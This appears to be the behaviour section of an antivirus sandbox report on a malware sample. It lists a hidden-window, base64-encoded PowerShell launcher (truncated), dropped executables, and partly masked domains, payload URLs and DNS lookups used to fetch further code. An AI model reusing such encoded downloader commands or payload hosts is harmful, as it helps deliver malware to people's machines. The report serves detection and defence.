Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABCAHIAdwBuAGIAbABuAHUAcwBuAHkAbwB6AD0AJwBPAGMAdwByAG8AcQBrAHYAbgBhAGQAcgB0ACcAOwAkAEIAbABjAGMAcAB2AGYAZQAgAD0AIAAnADEAMAA4ACcAOwAkAE0AZgBmAHEAcgB5AGoAbAByAGYAYQA9ACcAQwBuAG0AegB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1572
- %TEMP%\1169102.cvr
- %HOMEPATH%\108.exe
- %HOMEPATH%\108.exe
- 'bi###eemgmt.com':80
- 'ad#####tycreative.com':80
- 'bu#####express.co.uk':80
- http://bi###eemgmt.com/wordpress/5gvh2bvxjk-adyl4d-51055/
- http://www.bi###eemgmt.com/wordpress/5gvh2bvxjk-adyl4d-51055/
- http://ad#####tycreative.com/x92k25/StPHhUr/
- http://www.ad#####tycreative.com/x92k25/StPHhUr/
- http://www.bu#####express.co.uk/exclusive/gvDKTV/
- DNS ASK bi###eemgmt.com
- DNS ASK ad#####tycreative.com
- DNS ASK ro####rfeito.com.br
- DNS ASK ng####epxumuong.vn
- DNS ASK bu#####express.co.uk
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABCAHIAdwBuAGIAbABuAHUAcwBuAHkAbwB6AD0AJwBPAGMAdwByAG8AcQBrAHYAbgBhAGQAcgB0ACcAOwAkAEIAbABjAGMAcAB2AGYAZQAgAD0AIAAnADEAMAA4ACcAOwAkAE0AZgBmAHEAcgB5AGoAbAByAGYAYQA9ACcAQwBuAG0AegB...' (со скрытым окном)